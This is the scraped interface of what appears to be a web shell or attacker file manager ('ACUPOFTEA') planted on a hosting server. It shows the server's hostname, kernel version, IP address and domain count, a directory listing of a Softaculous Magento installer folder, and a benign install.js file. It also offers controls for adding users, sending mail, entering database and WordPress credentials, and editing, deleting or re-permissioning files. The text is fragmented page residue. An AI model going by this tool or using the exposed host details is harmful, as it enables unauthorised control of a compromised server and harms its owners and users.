System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
magento241
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
install.js
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// // Check if there is a number in random generated password function update_admin_pass(){ if(typeof jQuery('#admin_pass').val() == "undefined"){ setTimeout('update_admin_pass();', 500); return; } var admin_pass = jQuery('#admin_pass').val(); var isnum = /\d+/.test(admin_pass); if(!isnum){ admin_pass = admin_pass+Math.floor((Math.random() * 10) + 1); jQuery('#admin_pass').val(admin_pass); } } update_admin_pass(); // Check if dbprefix is less than 6 chars function update_dbprefix(){ if(typeof jQuery('#dbprefix').val() == "undefined"){ setTimeout('update_dbprefix();', 500); return; } var dbprefix = jQuery('#dbprefix').val(); var length = dbprefix.length; if(length > 5){ newdbprefix = dbprefix.substring(0, 4); jQuery('#dbprefix').val(newdbprefix+"_"); } } setTimeout('update_dbprefix();', 1000); function formcheck(){ if($('dbprefix').value.length > 5){ alert('{{err_dbprefixlen}}'); return false; } //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; };
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
php53
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
php56
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
php71
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
php81
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
php82
DIR
-
drwxr-xr-x
2024-12-07 09:39:53
.htaccess
text/x-Algol68
10.99 KB
-rw-r--r--
2023-03-01 08:03:18
Notes.txt
text/x-Algol68
3.01 KB
-rw-r--r--
2023-03-01 08:03:18
_config.php
text/x-php
13.56 KB
-rw-r--r--
2023-03-01 08:03:18
changelog.txt
text/plain
85.57 KB
-rw-r--r--
2023-03-01 08:03:18
check_elasticsearch.php
text/x-php
3.65 KB
-rw-r--r--
2023-03-01 08:03:18
clone.php
text/x-php
5.33 KB
-rw-r--r--
2024-12-05 06:09:46
config.php
text/x-php
12.76 KB
-rw-r--r--
2023-03-01 08:03:18
di.xml
text/xml
123.46 KB
-rw-r--r--
2023-03-01 08:03:18
edit.php
text/x-php
4.38 KB
-rw-r--r--
2024-12-05 06:09:46
edit.xml
text/html
433 B
-rw-r--r--
2024-12-04 08:17:30
env.php
text/x-php
1.99 KB
-rw-r--r--
2023-03-01 08:03:18
fileindex.php
text/plain
323 B
-rw-r--r--
2023-03-01 08:03:18
import.php
text/x-php
5.9 KB
-rw-r--r--
2024-12-05 06:09:46
info.xml
text/html
4.27 KB
-rw-r--r--
2024-12-04 08:17:30
install.js
text/plain
1.81 KB
-rw-r--r--
2023-03-01 08:03:18
install.php
text/x-php
28.38 KB
-rw-r--r--
2024-12-05 06:09:46
install.xml
text/html
2.56 KB
-rw-r--r--
2023-03-01 08:03:18
md5
text/plain
3.49 KB
-rw-r--r--
2024-12-05 06:09:46
pub_.htaccess
text/x-Algol68
6.06 KB
-rw-r--r--
2023-03-01 08:03:18
pubstatic_.htaccess
text/plain
3.71 KB
-rw-r--r--
2023-03-01 08:03:18
remove.php
text/x-php
2.53 KB
-rw-r--r--
2024-12-05 06:09:46
~ ACUPOFTEA - mail.ontime-ae.com